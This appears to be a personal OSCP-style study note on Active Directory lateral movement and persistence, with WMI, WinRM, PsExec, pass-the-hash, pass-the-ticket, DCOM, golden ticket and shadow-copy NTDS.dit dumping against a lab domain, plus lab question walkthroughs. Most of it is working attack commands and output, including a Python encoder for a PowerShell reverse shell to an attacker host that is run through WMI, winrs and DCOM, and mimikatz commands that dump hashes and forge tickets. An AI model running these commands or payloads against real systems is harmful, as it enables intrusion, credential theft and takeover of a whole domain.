23. Lateral Movement in Active Directory

[WDavid404]

• Active Directory Lateral Movement Techniques
• Active Directory Persistence

[WDavid404]

23.1. Active Directory Lateral Movement Techniques

• Understand WMI, WinRS, and WinRM lateral movement techniques
• Abuse PsExec for lateral movement
• Learn about Pass The Hash and Overpass The Hash as lateral movement techniques
• Misuse DCOM to move laterally

23.1.1. WMI and WinRM

The first lateral movement technique we are going to cover is based on Windows Management Instrumentation (WMI), which is an object-oriented feature that facilitates task automation.

WMI communicates through Remote Procedure Calls (RPC) over port 135 for remote access and uses a higher-range port (19152-65535) for session data.

To create a process on the remote target via WMI, we need the credentials of a member of the Administrators local group, which can also be a domain user. In the following examples, we are going to perform the attacks as the user jen, which is both a domain user and a member of the Local Administrator group for the target machines.

Running the wmic utility to spawn a process on a remote system.

C:\Users\jeff>wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 752;
        ReturnValue = 0;
};

The WMI job returned the PID of the newly created process and a return value of "0", meaning that the process has been created successfully. On the target machine，In Task Manager we would see the win32calc.exe process appear with jen as the user.

因为wmic utility已经被废弃了，所以我们接下来试着通过powershell命令来实现相同的功能： Creating the PSCredential object in PowerShell

$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options 
$command = 'calc';

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

执行结果上面的powershell结果

ProcessId ReturnValue PSComputerName
--------- ----------- --------------
     3712           0 192.168.50.73

On the target machine，we can see：

To further improve our craft, let's replace the previous payload with a full reverse shell written in PowerShell. encode.py file

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

Once we have saved the Python script, we can run it and retrieve the output to use later.

kali@kali:~$ python3 encode.py
powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAU...
OwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

以上是为了生成一个encode后的powershell的payload

After setting up a Netcat listener on port 443 on our Kali machine, we can move on to client74 and run the PowerShell WMI script with the newly generated encoded reverse shell payload.

PS C:\Users\jeff> $username = 'jen';
PS C:\Users\jeff> $password = 'Nexus123!';
PS C:\Users\jeff> $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
PS C:\Users\jeff> $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

PS C:\Users\jeff> $Options = New-CimSessionOption -Protocol DCOM
PS C:\Users\jeff> $Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options

PS C:\Users\jeff> $Command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';

PS C:\Users\jeff> Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

ProcessId ReturnValue PSComputerName
--------- ----------- --------------
     3948           0 192.168.50.73

On nc listener, we can get a reserve shell from the target machine...

WinRM

As an alternative method to WMI for remote management, WinRM can be employed for remote host management. WinRM is the Microsoft version of the WS-Management protocol and it exchanges XML messages over HTTP and HTTPS. It uses TCP port 5986 for encrypted HTTPS traffic and port 5985 for plain HTTP. The winrs utility can be invoked by specifying the target host through the -r: argument and the username with -u: and password with -p.

C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123!  "cmd /c hostname & whoami"
FILES04
corp\jen

To convert this technique into a full lateral movement scenario, we just need to replace the previous commands with the base64 encoded reverse-shell we wrote earlier.

C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123!  "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

PowerShell also has WinRM built-in capabilities called PowerShell remoting, which can be invoked via the New-PSSession cmdlet by providing the IP of the target host along with the credentials in a credential object format similar to what we did previously.

PS C:\Users\jeff> $username = 'jen';
PS C:\Users\jeff> $password = 'Nexus123!';
PS C:\Users\jeff> $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
PS C:\Users\jeff> $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

PS C:\Users\jeff> New-PSSession -ComputerName 192.168.50.73 -Credential $credential

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
  1 WinRM1          192.168.50.73   RemoteMachine   Opened        Microsoft.PowerShell     Available

To interact with the session ID 1 we created, we can issue the Enter-PSSession cmdlet followed by the session ID.

PS C:\Users\jeff> Enter-PSSession 1
[192.168.50.73]: PS C:\Users\jen\Documents> whoami
corp\jen

[192.168.50.73]: PS C:\Users\jen\Documents> hostname
FILES04

[WDavid404]

23.1.2. PsExec

PsExec is a very versatile tool that is part of the SysInternals suite developed by Mark Russinovich.

Three requisites：

• The user that authenticates to the target machine needs to be part of the Administrators local group.
• The ADMIN$ share must be available
• File and Printer Sharing has to be turned on. Luckily for us, the last two requirements are already met as they are the default settings on modern Windows Server systems.

To execute the command remotely, PsExec performs the following tasks:

• Writes psexesvc.exe into the C:\Windows directory
• Creates and spawns a service on the remote host
• Runs the requested program/command as a child process of psexesvc.exe

Even though PsExec is not installed by default on Windows, we can easily transfer it to our compromised machine.

For this scenario, let's assume we have RDP access as the offsec local administrator on CLIENT74 as we already discovered its clear-text password on FILES04.

PS C:\Tools\SysinternalsSuite> ./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
FILES04

C:\Windows\system32>whoami
corp\jen

[WDavid404]

23.1.3. Pass the Hash

The Pass the Hash (PtH) technique allows an attacker to authenticate to a remote system or service using a user's NTLM hash instead of the user's plaintext password. Note that this will only work for servers or services using NTLM authentication, not for servers or services using Kerberos authentication. This lateral movement sub-technique is also mapped in the MITRE Framework under the Use Alternate Authentication Material general technique.

Tools: PsExec from Metasploit Passing-the-hash toolkit Impacket

PtH has three prerequisites that must be met.

1. it requires an SMB connection through the firewall (commonly port 445)
2. The Windows File and Printer Sharing feature to be enabled. These requirements are common in internal enterprise environments.
3. The admin share called ADMIN$ must to be available. To establish a connection to this share, the attacker must present valid credentials with local administrative permissions. In other words, this type of lateral movement typically requires local administrative rights.

kali@kali:~$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
FILES04

C:\>whoami
files04\administrator

This method works for Active Directory domain accounts and the built-in local administrator account. However, due to the 2014 security update, this technique can not be used to authenticate as any other local admin account.

[WDavid404]

23.1.4. Overpass the Hash

With [overpass the hash], we can "over" abuse an NTLM user hash to gain a full Kerberos [Ticket Granting Ticket] (TGT). Then we can use the TGT to obtain a [Ticket Granting Service] (TGS).

To demonstrate this, let's assume we have compromised a workstation (or server) that jen has authenticated to. We'll also assume that the machine is now caching their credentials (and therefore, their NTLM password hash).

To simulate this cached credential, we will log in to the Windows 10 CLIENT76 machine as jeff and run a process as jen, which prompts authentication.

From here, we enter jen as the username along with the associated password, which will launch Notepad in the context of that user. After successful authentication, jen's credentials will be cached on this machine.

The command below will dump the cached password hashes.

mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
...

## This output shows jen's cached credentials under jen's own session. 
It includes the NTLM hash, which we will leverage to overpass the hash.
## The essence of the overpass the hash lateral movement technique is 
to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication. 
A simple way to do this is with the sekurlsa::pth command from Mimikatz.

mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell 
...

==> At this point, we have a new PowerShell session that allows us to execute commands as jen. Note: At this point, running the whoami command on the newly created PowerShell session would show jeff's identity instead of jen. While this could be confusing, this is the intended behavior of the whoami utility which only checks the current process's token and does not inspect any imported Kerberos tickets

Let's list the cached Kerberos tickets with klist.

PS C:\Windows\system32> klist No Kerberos tickets have been cached, but this is expected since jen has not yet performed an interactive login. Let's generate a TGT by authenticating to a network share on the files04 server with net use.

PS C:\Windows\system32> net use \\files04
The command completed successfully.

The output indicates that the net use command was successful. Now let's use the klist command to list the newly requested Kerberos tickets....

We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM).

PS C:\Windows\system32> cd C:\tools\SysinternalsSuite\
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\files04 cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
corp\jen

C:\Windows\system32>hostname
FILES04

[WDavid404]

23.1.5. Pass the Ticket

The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service. In addition, if the service tickets belong to the current user, then no administrative privileges are required.

In this scenario, we are going to abuse an already existing session of the user dave. The dave user has privileged access to the backup folder located on WEB04 whereas our logged-in user jen does not.

mimikatz #privilege::debug
Privilege '20' OK

mimikatz #sekurlsa::tickets /export

The above command parsed the [LSASS] process space in memory for any TGT/TGS, which is then saved to disk in the kirbi mimikatz format. We can verify newly generated tickets with dir, filtering out on the kirbi extension. PS C:\Tools> dir *.kirbi

As many tickets have been generated, we can just pick any TGS ticket in the dave@cifs-web04.kirbi format and inject it through mimikatz via the kerberos::ptt command.

mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

* File: '[0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi': OK

confirm that the dave ticket has been successfully imported in our own session for the jen user.

PS C:\Tools> klist

Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

Then,

PS C:\Tools> ls \\web04\backup

    Directory: \\web04\backup

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt

Yeah, We managed to successfully access the folder by impersonating dave's identity after injecting its authentication token into our user's process.

[WDavid404]

23.1.6. DCOM

Both COM and DCOM are very old technologies dating back to the very first editions of Windows. Interaction with DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM Service Control Manager, which is essentially an API.

Cybereason documented a collection of various DCOM lateral movement techniques, [including one discovered by Matt Nelson], which we are covering in this section.

The discovered DCOM lateral movement technique is based on the Microsoft Management Console COM application that is employed for scripted automation of Windows systems.

We are going to demonstrate this lateral movement attack as the jen user logged in from the already compromised Windows 11 CLIENT74 host. The target IP of FILES04 is 192.168.50.73 Info：在powershell里执行下面的command

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

Once we execute these two PowerShell lines from CLIENT74, we should have spawned an instance of the calculator app.

Because it's within Session 0, we can verify the calculator app is running with tasklist and filtering out the output with findstr （Verifying that calculator is running on FILES04）

# On FILES04
C:\Users\Administrator>tasklist | findstr "calc"
win32calc.exe                 4764 Services                   0     12,132 K

We can now improve our craft by extending this attack to a full reverse shell similar to what we did in the WMI and WinRM section earlier in this Module.

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

Switching to our Kali machine, we can verify any incoming connections on the listener that we simultaneously set up.

kali@kali:~$ nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.118.2] from (UNKNOWN) [192.168.50.73] 50778

PS C:\Windows\system32> whoami
corp\jen

PS C:\Windows\system32> hostname
FILES04

[WDavid404]

23.2. Active Directory Persistence

• 23.2.1. Golden Ticket
• 23.2.2. Shadow Copies

23.2.1. Golden Ticket

when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is the password hash of a domain user account called [krbtgt].

If we can get our hands on the krbtgt password hash, we could create our own self-made custom TGTs, also known as [golden tickets].

While Silver Tickets aim to forge a TGS ticket to access a specific service, Golden Tickets give us permission to access the entire domain's resources. For example, we could create a TGT stating that a non-privileged user is a member of the Domain Admins group, and the domain controller will trust it because it is correctly encrypted.

The best advantage is that the krbtgt account password is not automatically changed.

On DC1 注意： 需要用Domain Admins的user login到DC1里，获得制作golden ticket想要的info 执行mimikatz

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::lsa /patch
Domain : CORP / S-1-5-21-1987370270-658905905-1781884369 ==> 后面要用

。。。。。

RID  : 000001f6 (502)
User : krbtgt            ===》 找的就是他
LM   :
NTLM : 1693c6cefafffc7af11ef34d1c788f47  ==》后面要用
....

On CLIENT74 machine

## Before we generate the golden ticket 
## let's launch mimikatz and delete any existing Kerberos tickets 
## with kerberos::purge.
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

## Now, we'll supply the domain SID (which we can gather with whoami /user) 
## to the Mimikatz [kerberos::golden] command to create the golden ticket.
## 
## Let's set the golden ticket's username to jen. 
## Before it didn't matter if the account existed.
## 
mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
User      : jen
Domain    : corp.com (CORP)
SID       : S-1-5-21-1987370270-658905905-1781884369
User Id   : 500    ==> The user ID is set to 500 by default, which is the RID of the built-in administrator for the domain. 
Groups Id : *513 512 520 518 519  ==> the groups ID consist of the most privileged groups in Active Directory, including the Domain Admins group.
....

Golden ticket for 'jen @ corp.com' successfully submitted for current session

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800

With the golden ticket injected into memory, let's use PsExec_ to launch a new command prompt with misc::cmd.

C:\Tools\SysinternalsSuite>PsExec.exe \\dc1 cmd.exe

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Windows\system32>ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::5cd4:aacd:705a:3289%14
   IPv4 Address. . . . . . . . . . . : 192.168.50.70
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.50.254
C:\Windows\system32>whoami
corp\jen

C:\Windows\system32>whoami /groups
.....
CORP\Domain Admins   group
...

Note that by creating our own TGT and then using PsExec, we are performing the overpass the hash attack by leveraging Kerberos authentication as we discussed earlier in this Module.

If we were to connect PsExec to the IP address of the domain controller instead of the hostname, we would instead force the use of NTLM authentication and access would still be blocked.

C:\Tools\SysinternalsSuite> psexec.exe \\192.168.50.70 cmd.exe

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Couldn't access 192.168.50.70:
Access is denied.

Summary

In this section, we have demonstrated the golden ticket technique as a persistence mechanism. By obtaining the NTLM hash of the krbtgt user, we can issue domain-administrative TGTs to any existing low-privileged account. This allows us to obtain inconspicuous legitimate access to the entire AD domain.

[WDavid404]

23.2.2. Shadow Copies

A Shadow Copy, also known as Volume Shadow Service (VSS) is a Microsoft backup technology that allows the creation of snapshots of files or entire volumes.

Tool：vshadow.exe

As domain admins, we can abuse the vshadow utility to create a Shadow Copy that will allow us to extract the Active Directory Database NTDS.dit database file. Once we've obtained a copy of the database, we need the SYSTEM hive, and then we can extract every user credential offline on our local Kali machine.

On Windows

## 注意：必须要以administrator启动cmd才可以。用powershell的时候copy命令不起作用
## vshadow utility with -nw options to disable writers, which speeds up backup creation 
## and include the -p option to store the copy on disk.

C:\Tools>vshadow.exe -nw -p  C:
C:\Tools>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak

C:\>reg.exe save hklm\system c:\system.bak
The operation completed successfully.

On Kali

kali@kali:~$ impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
。。。
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
。。。

注意：Administrator的ntlm hash是最后一个：2892d26cdf84d7a70e2eb3b9f05c425e

We managed to obtain NTLM hashes and Kerberos keys for every AD user. We can now try to crack them or use as-is in pass-the-hash attacks. 比如利用上面Administrator的ntlm hash执行pass the hash kali@kali: ~$ impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.243.70

[WDavid404]

More info https://github.com/WDavid404/Note_tryhackme/issues/1

[WDavid404]

Questions

23.2.2 Q3

1. RDP login to client74 with leon (he has administrator right)
2. mimikatz logonpassword没有发现有用的info
3. Kali上执行 crackmapexec smb ip_list -u leon -p 'HomeTaping199!' -d corp.com --continue-on-success 发现leon也是file04的admin用户。。。
4. 直接rdp login to file04 with leon。。

23.2.2 Q4

1. On Kali: crackmapexec smb ip_list -u leon -p 'HomeTaping199!' -d corp.com --continue-on-success ==> leon只是client76的admin
2. RDP login to client76 with leon
3. mimikatz sukerlsa::logonpasswords ==> 有dave和offsec的info
4. sekurlsa::pth /user:dave /domain:corp.com /ntlm:08d7a47a6f9f66b97b1bae4178747494 /run:powershell
5. 在另外启动的powershell执行下面命令

   
   net use \\web04 --》 成功
   C:\tools\SysinternalsSuite> .\PsExec.exe \\web04 cmd   ==》 失败
   ## 取得web04的共享目录一览用这个command （！！）： 
   net view \\web04 

![image](https://github.com/WDavid404/OSCP/assets/137129330/13b25ca6-d851-425b-96cc-47d0df8f9a30)

PS：offsec用户连第一行的 net use \\web04 都无法执行，放弃之）

6.  ls \\web04\backup
7.  type \\web04\backup\proof.txt

[WDavid404]

New tool: netexec

crackmapexec got deprecated , so my advice is to use both just to make sure if one of them missed anything

https://www.netexec.wiki/ Installation:

sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

After installation, open a new shell:

NetExec